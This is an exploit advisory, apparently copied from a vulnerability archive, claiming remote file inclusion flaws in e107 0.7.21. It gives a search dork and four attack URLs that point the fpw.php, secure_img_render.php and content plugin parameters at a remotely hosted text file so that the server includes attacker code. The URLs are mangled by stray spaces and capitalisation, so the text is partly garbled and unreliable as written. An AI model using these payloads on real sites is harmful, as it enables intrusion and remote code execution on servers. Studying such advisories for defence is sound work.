Test method:
The Program (method) provided on this site may be offensive and only used for security research and teaching. You are at your own risk! # Name: e107 0.7.21 full (RFI) Vulnerabilities
# Vendor: http://e107.org/
# Author: indoushka
# Thanks to: Inj3ct0r.com, Exploit-DB.com, SecurityReason.com, Hack0wn.com!
# Bug: RFI
# Tested on: windows SP2 franceais V. (Pnx2 2.0)
######################################## ################################
# Dork: This site is powered by e107, which is released under the terms
The gnu gpl License.
# Exploit By indoushka
I-RFI:
1-http: // localhost/e107/fpw. php? THEMES_DIRECTORY = http: // localhost/c.txt?
2-
Http: // localhost/e107/e107_handlers/secure_img_render.php? Ifile = http: // loca
Lhost/c.txt?
3-
Http: // localhost/e107/e107_plugins/content/handlers/content_class.php? Plugi
Ndir = http: // localhost/c.txt?
4-
Http: // localhost/e107/e107_plugins/content/handlers/content_convert_class.p
Hp? Plugindir = http: // localhost/c.txt?